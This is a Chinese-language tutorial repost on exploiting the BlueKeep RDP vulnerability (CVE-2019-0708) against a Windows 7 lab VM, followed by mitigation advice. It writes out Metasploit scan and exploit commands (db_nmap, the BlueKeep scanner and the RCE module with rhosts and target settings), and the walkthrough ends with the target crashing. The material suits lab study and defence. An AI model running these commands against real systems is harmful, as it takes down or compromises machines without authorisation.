CVE-2019-0708蠕虫级漏洞利用

编程入门 行业动态 更新时间:2024-10-27 04:27:19

前言

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

CVE-2019-0708漏洞利用

靶机win7旗舰版sp1 ip:192.168.111.128
攻击机kali ip:192.168.111.130

先在靶机上把远程连接这里设置了

回到kali对靶机进行扫描 db_nmap -sT -T4 192.168.111.128

那么扫描结果是开启了3389远程服务端口,然后我们尝试搜索CVE-2019-0708这个编号的利用模块

接着可以看到有一个 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 扫描模块我们进行使用
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

设置扫描目标 set rhosts 192.168.111.128 run

扫描结果:The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. 可能存在漏洞 我们尝试利用

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

设置攻击目标 set rhosts 192.168.111.128

设置攻击的操作系统 set target 1 攻击运行 run


目标机器蓝屏
具体参考:https://blog.csdn/qq_29647709/article/details/100610285

安全漏洞修复

及时打对应系统的安全补丁
关闭3389端口或添加防火墙安全策略限制对3389端口的访问
打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

更多推荐

CVE-2019-0708蠕虫级漏洞利用

本文发布于:2023-06-14 09:54:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1463171.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:蠕虫   漏洞   CVE

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!